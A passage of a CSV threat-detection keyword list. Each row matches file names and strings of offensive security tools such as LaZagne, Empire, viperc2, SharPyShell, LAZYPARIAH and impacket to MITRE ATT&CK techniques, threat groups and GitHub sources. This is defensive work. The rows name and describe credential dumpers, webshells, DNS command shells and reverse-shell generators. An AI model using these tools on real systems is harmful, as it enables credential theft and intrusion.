TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/WMIExec.cs*",".{0,1000}Lateral\/WMIExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*lateral_wmi.py*",".{0,1000}lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*LateralMovement_*_Exploit*.py",".{0,1000}LateralMovement_.{0,1000}_Exploit.{0,1000}\.py","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the 
process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_ExploitationOfRemoteServices_MS17010.py*",".{0,1000}LateralMovement_ExploitationOfRemoteServices_MS17010\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_Other_Ladon.py*",".{0,1000}LateralMovement_Other_Ladon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheHash_ByInvokeWMIExec.py*",".{0,1000}LateralMovement_PassTheHash_ByInvokeWMIExec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the 
tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheHash_ByWmi.py*",".{0,1000}LateralMovement_PassTheHash_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheTicket_ByPsexec.py*",".{0,1000}LateralMovement_PassTheTicket_ByPsexec\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheTicket_BySharpwmi.py*",".{0,1000}LateralMovement_PassTheTicket_BySharpwmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which 
modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*LateralMovement_PassTheTicket_ByWmi.py*",".{0,1000}LateralMovement_PassTheTicket_ByWmi\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Laudanum PHP File Browser*",".{0,1000}Laudanum\sPHP\sFile\sBrowser.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Laudanum PHP Hostname by IP Lookup*",".{0,1000}Laudanum\sPHP\sHostname\sby\sIP\sLookup.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Laudanum PHP 
Proxy*",".{0,1000}Laudanum\sPHP\sProxy.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Laudanum PHP Shell Access*",".{0,1000}Laudanum\sPHP\sShell\sAccess.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*Launch Empire CLI*",".{0,1000}Launch\sEmpire\sCLI.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*Launch Empire Server*",".{0,1000}Launch\sEmpire\sServer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*launch4j launch4j/sAINT.xml*",".{0,1000}launch4j\slaunch4j\/sAINT\.xml.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" 
"*LaunchExploitMode.ps1*",".{0,1000}LaunchExploitMode\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*",".{0,1000}LAUNCHING\sGPODDITY\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPO\sREQUESTS.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*LaunchPreCompromise.ps1*",".{0,1000}LaunchPreCompromise\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*lawrenceamer/dns-black-cat*",".{0,1000}lawrenceamer\/dns\-black\-cat.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*lawrenceamer/Tchopper*",".{0,1000}lawrenceamer\/Tchopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*layer8secure/SilentHound*",".{0,1000}layer8secure\/SilentHound.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*Lazagne*Passwords.txt*",".{0,1000}Lazagne.{0,1000}Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*laZagne.exe browsers*",".{0,1000}laZagne\.exe\sbrowsers.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*Lazagne.exe*",".{0,1000}Lazagne\.exe.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*laZagne.exe*",".{0,1000}laZagne\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Lazagne.py*",".{0,1000}Lazagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazagne.softwares.sysadmin.aws*",".{0,1000}lazagne\.softwares\.sysadmin\.aws.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazagne.softwares.windows*",".{0,1000}lazagne\.softwares\.windows.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazagne.tar.gz*",".{0,1000}lazagne\.tar\.gz.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*LaZagneForensic*",".{0,1000}LaZagneForensic.{0,1000}","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","5","472","109","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z" "*LaZagne-master.zip*",".{0,1000}LaZagne\-master\.zip.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*lazynmap.sh*",".{0,1000}lazynmap\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*lazypariah *",".{0,1000}lazypariah\s.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*lazypariah.svg*",".{0,1000}lazypariah\.svg.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "*L'D', L'b', L'g', L'h', L'e', L'l', L'p', L'.', L'd', L'l', L'l', L'\0'*",".{0,1000}L\'D\',\sL\'b\',\sL\'g\',\sL\'h\',\sL\'e\',\sL\'l\',\sL\'p\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*ldap as ldap_impacket*",".{0,1000}ldap\sas\sldap_impacket.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*LDAP PASSWORD 
ENUM*",".{0,1000}LDAP\sPASSWORD\sENUM.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*LDAP PASSWORD HUNTER*",".{0,1000}LDAP\sPASSWORD\sHUNTER.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*ldap_enums.go*",".{0,1000}ldap_enums\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*ldap_shell.py*",".{0,1000}ldap_shell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ldapasn1.py*",".{0,1000}ldapasn1\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ldapdomaindump*",".{0,1000}ldapdomaindump.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*LDAPDomainDump*",".{0,1000}LDAPDomainDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
